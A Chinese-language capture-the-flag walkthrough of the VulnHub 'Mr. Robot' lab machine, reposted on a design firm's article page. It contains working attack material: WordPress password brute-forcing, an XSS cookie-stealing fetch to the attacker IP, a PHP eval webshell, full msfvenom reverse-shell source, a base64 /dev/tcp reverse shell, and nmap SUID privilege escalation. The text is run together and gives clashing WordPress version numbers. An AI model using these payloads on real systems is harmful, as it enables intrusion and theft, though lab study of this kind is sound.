尧图网站设计 尧图网站设计YAOTU DESIGN
ARTICLE DETAIL

资讯详情

深耕网站设计与一线实操的经验洞察。

vulnhub系列靶机-mrRobot

vulnhub系列靶机-mrRobot 端口目录[22:36:32] 200 - 504KB - /intro[22:36:37] 200 - 158B - /license[22:36:37] 200 - 158B - /license.txt[22:37:05] 200 - 64B - /readme[22:37:06] 200 - 64B - /readme.html[22:37:08] 200 - 41B - /robots.txt[22:37:38] 200 - 21B - /wp-admin/admin-ajax.php[22:37:39] 200 - 1KB - /wp-login.php[22:37:39] 200 - 1KB - /wp-login/[22:37:39] 200 - 1KB - /wp-login重点 /license.txt 、/robots.txt、/readme.htmlwordpress 默认说明文件 /wp-login.php、/wp-login/WordPress 后台登录页面这是突破口 /wp-admin/、wp‑content、wp‑config.phpwp 核心目录文件目录访问/licensewhat you do just pull code from Rapid9 or some s#% since when did you become a script kitty?翻译你就只会复制 Rapid9WPScan 所属公司的代码吗从什么时候起你变成只会跑工具的脚本小子了/robots.txtfsocity.dicfsocity.dic 是一个出自热门安全挑战 “Mr. Robot” CTF夺旗赛 的密码字典文件生成一个精简的新字典文件。例如sort fsocity.dic | uniq fsocity_uniq.dickey-1-of-3.txt073403c8a58a1f80d943455fb30724b9这是第一个key/WordPress/wp-login.php这个可用刚刚的账号密码破解没破出来现在点击忘记密码爆破这个发现一个奇怪的说明用户名就是这个elliot现在继续用这个用户名来·暴力破解密码找到密码ER28-0652elliot登录wordpresselliotER28-0652来就看到版本信息WordPress 7.0.4直接查看该版本漏洞msfconsole#搜索4.3.1相关search wordpress 4.3.1msf 里面没有针对 WordPress 核心 4.3.1 的 EXP 利用模块搜出来的只是某第三方插件的漏洞。放弃这一想法发现新的用户mich05654暴力破解得到密码Dylan_2791登录后发现没有用放弃这条路现在去测试刚刚的XSS回到管理员用户elliot使用XSS点击查看文章后有XSS那就只要管理员访问你的这篇恶意文章浏览器就会执行你的 JS拿到管理员 Cookie。步骤 1构造偷管理员 Cookie 的 Payload把文章标题替换为下面 payload把192.168.113.100改成 kali 的 IPscriptfetch(http://192.168.113.138/steal?cdocument.cookie)/script步骤 2Kali 开启 HTTP 接收 cookiemkdir /tmp/xsscd /tmp/xsspython3 -m http.server 80拿到的这组 cookie没有 wordpress_logged_in_ 登录凭证。wordpress_test_cookie 只是 WP 用来测试 cookie 功能是否开启的测试 cookie不是登录凭证。其余都是前端浏览设置、统计类 cookie拿到也无法实现后台登录。放弃XSS修改页面代码注入一句话木马elliot本身就是管理员XSS 在这里不再用来偷权限XSS 只是一个执行 JS 的入口拿到 shell 的核心是 WordPress 后台上传 / 写文件拿 Webshell。http://192.168.113.144/wp-admin自理有很多php文件随便选一个注入一句话木马eval($_POST[cmd]); phpinfo();成功触发一剑上线http://192.168.113.144/wp-content/themes/twentyfifteen/404.phpcmd提权打开终端进行信息收集idwhoamiuname -acat /etc/passwdpwdenvsudo -l现在用户是daemon要提权才是真正的成功着重看有没有用户有/bin/bash可以提权DC-4后遗症查看靶机内的用户发现只有robot在/home下有目录不过查看/etc/passwd并没有指定bash切换到robot下发现有密码文件具有查看权限查看发现是md5加密c3fcd3d76192e4007dfb496cca67e13b这个是第二个key这个是robot的密码abcdefghijklmnopqrstuvwxyz(daemon:/)$uname-aLinuxlinux3.13.0-55-generic#94-UbuntuSMPThuJun1800:27:10UTC2015x86_64x86_64x86_64GNU/Linux系统Ubuntu Linux 3.13.0‑55‑generic绝对有漏洞msf查看Ubuntu Linux 3.13.0‑55‑generic版本漏洞search Linux 3.13.0内核 3.13.0‑55‑generic 完全命中该漏洞msf 内置本地提权模块不用上传脏牛源码直接 meterpreter 会话内执行。使用前提必须拿到Meterpreter会话普通 nc bash shell 不能跑这个 local 模块。如果你现在只有蚁剑 webshellmsf 执行exploit/multi/script/web_delivery生成 php payload在蚁剑终端粘贴执行 payload拿到 meterpreter 会话。前提kali MSF 已经开好 handler 监听等待上线use exploit/multi/handlerset PAYLOAD php/meterpreter/reverse_tcpset LHOST 192.168.113.138set LPORT 4440run1、kali 生成 payload 代码新开终端不要关监听msfvenom -p php/meterpreter/reverse_tcp LHOST192.168.113.138 LPORT4440 -f rawPayload size: 1116 bytes/*?php /**/ error_reporting(0); $ip 192.168.113.138; $port 4440; if (($f stream_socket_client) is_callable($f)) { $s $f(tcp://{$ip}:{$port}); $s_type stream; } if (!$s ($f fsockopen) is_callable($f)) { $s $f($ip, $port); $s_type stream; } if (!$s ($f socket_create) is_callable($f)) { $s $f(AF_INET, SOCK_STREAM, SOL_TCP); $res socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type socket; } if (!$s_type) { die(no socket funcs); } if (!$s) { die(no socket); } switch ($s_type) { case stream: $len fread($s, 4); break; case socket: $len socket_read($s, 4); break; } if (!$len) { die(); } $a unpack(Nlen, $len); $len $a[len]; $b ; while (strlen($b) $len) { switch ($s_type) { case stream: $b . fread($s, $len-strlen($b)); break; case socket: $b . socket_read($s, $len-strlen($b)); break; } } $GLOBALS[msgsock] $s; $GLOBALS[msgsock_type] $s_type; if (extension_loaded(suhosin) ini_get(suhosin.executor.disable_eval)) { $suhosin_bypasscreate_function(, $b); $suhosin_bypass(); } else { eval($b); } die();完整全部复制一行都不要丢。2、切换蚁剑打开【终端】标签页注意不是文件上传就在蚁剑自带终端框里面直接粘贴运行。蚁剑终端里面直接粘贴刚刚复制的全部 php 代码直接回车执行。失败问了豆包蚁剑终端是 Linux shell不是 PHP 执行环境你直接粘贴 PHP 代码shell 把 php 当成 bash 命令解析直接报语法错误。❌不能直接在蚁剑的命令行终端粘贴 PHP 源码。数据库先在kali上线nc -lnvpcmdsystem(echo YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjExMy4xMzgvMTExMSAwPiYx|base64 -d|bash);首先查看wordpresss连接数据库的文件wp-config.phpfind / -name wp-config.php 2/dev/nullcat /opt/bitnami/apps/wordpress/htdocs/wp-config.php用户名bn_wordpress密码570fd42948数据库名称bitnami_wordpress端口是3306数据库类型是mysql使用find寻找具有SUID权限文件发现sudo不过测试当前用户不许sudofind / -perm -4000 -print 2/dev/nullfind / -perm -us -type f 2/dev/null找到了nmap可以进行提权这里的nmap不能直接使用 环境变量 的问题需要使用绝对路径尝试第一种方法发现提权不成功版本在第二种提权方式范围内尝试第二种方式/usr/local/bin/nmap --interactive!sh提权成功
返回列表